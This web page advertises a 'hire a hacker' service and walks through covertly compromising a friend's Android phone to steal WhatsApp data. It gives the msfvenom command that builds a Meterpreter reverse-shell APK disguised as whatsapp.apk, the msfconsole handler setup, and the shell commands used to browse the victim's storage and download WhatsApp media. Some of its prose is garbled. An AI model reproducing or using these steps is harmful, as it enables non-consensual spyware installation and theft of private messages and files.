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Hire a hacker for WhatsApp: How to Hack WhatsApp using Meterpreter in Kali Linux

Hire a hacker for WhatsApp

Hire a hacker for WhatsApp: Today, we will explain how you can access all of a friend’s WhatsApp data by hacking into his or her account.

All of this will be done on our Linux machine, which requires us to first copy a few commands and build a payload that we will then install on your friend’s phone and use to hack all of their info.

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Hire a hacker for WhatsApp: Kali Linux — Make A Payload

msfvenom -p android/meterpreter/reverse_tcp lhost=(YOUR IP) lport=(YOUR PORT NUMBER) R > whatsapp.apk

To generate a payload, you must first input a few commands that can be found in the command area. As seen in the picture here, you must also enter the IP address of your computer in the L host field and any available port number in the L port field.

Your payload will be built when you have entered the commands, and you will see some sort of interface inside.

which you have been informed of your payload’s size.

The payload must now be installed in our friend’s phone. You must open the payload after installing it.

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Hire a hacker for WhatsApp: Kali Linux — Open the Tool.


After that, you must launch a tool called (msfconsole) from your machine in order to control the payload.

which your payload is under your control. Your tool will launch as soon as you enter the clan’s name into your terminal.

as you can see in our picture, to open.

You can open a case with Cyberspac3.

Hire a hacker for WhatsApp: Kali Linux — Fill the Payload Info.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

As you can see, my tool has started working. I now need to connect my payload to its toll, and the command will be in the comment part.

set lhost (YOUR IP)

Next, you must provide the IP address of your device into the L host, followed by the exploit command,

When you press the enter key, my tool will start and be prepared to connect with the payload.

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Now that my tool is attached to the payload, you can observe that. You must open the payload again if you are unable to communicate with it. After that, a screen of some sort will appear in front of you.

You can open a case with Cyberspac3.

Hire a hacker for WhatsApp: Kali Linux — Go to Mobile Root Folder.

cd /
ls -l

You’ve linked to the phone here, and you now need to access his WhatsApp data phone, for which you must first access the root files of his device. The command is provided in the area for comments.

You can open a case with Cyberspac3.

Hire a hacker for WhatsApp: Kali Linux — Go to Sdcard.

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cd sdcard
ls -l

After arriving here, you must access the SD card, where each application’s data is saved. The commands for each application can be found in the comment section.

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After you reach the SD card, you will see the user interface for some of these programs, where all of the loaded applications on his phone will be made public.

You can open a case with Cyberspac3.

Hire a hacker for WhatsApp: Kali Linux-Go to WhatsApp Folder.

cd WhatsApp
ls -l

By the way, you need to access the WhatsApp folder and download the data from there; the instructions are in the comment area.

cd Media
ls -l

After coming inside WhatsApp, you will have some such files open in front of you, where you have to go to the media folder.

Your friend’s WhatsApp data will open once you reach the media folder, and you may now download anything from there.

cd WhatsApp \ Images
ls -l

For instance, I’ll download an image from the image folder and demonstrate the methods you may find above.

download (YOUR FILE NAME)

You must enter the name of the file you want to download after the image in the folder.

You can see that my file has been downloaded after pressing the enter key and downloading. After that, you can decide what you want.

You can download media, documents, etc. with this technique.

You must download your victim’s database in order to view chats; I will provide another guide for this. I hope this tutorial was helpful to you.

You can open a case with Cyberspac3.

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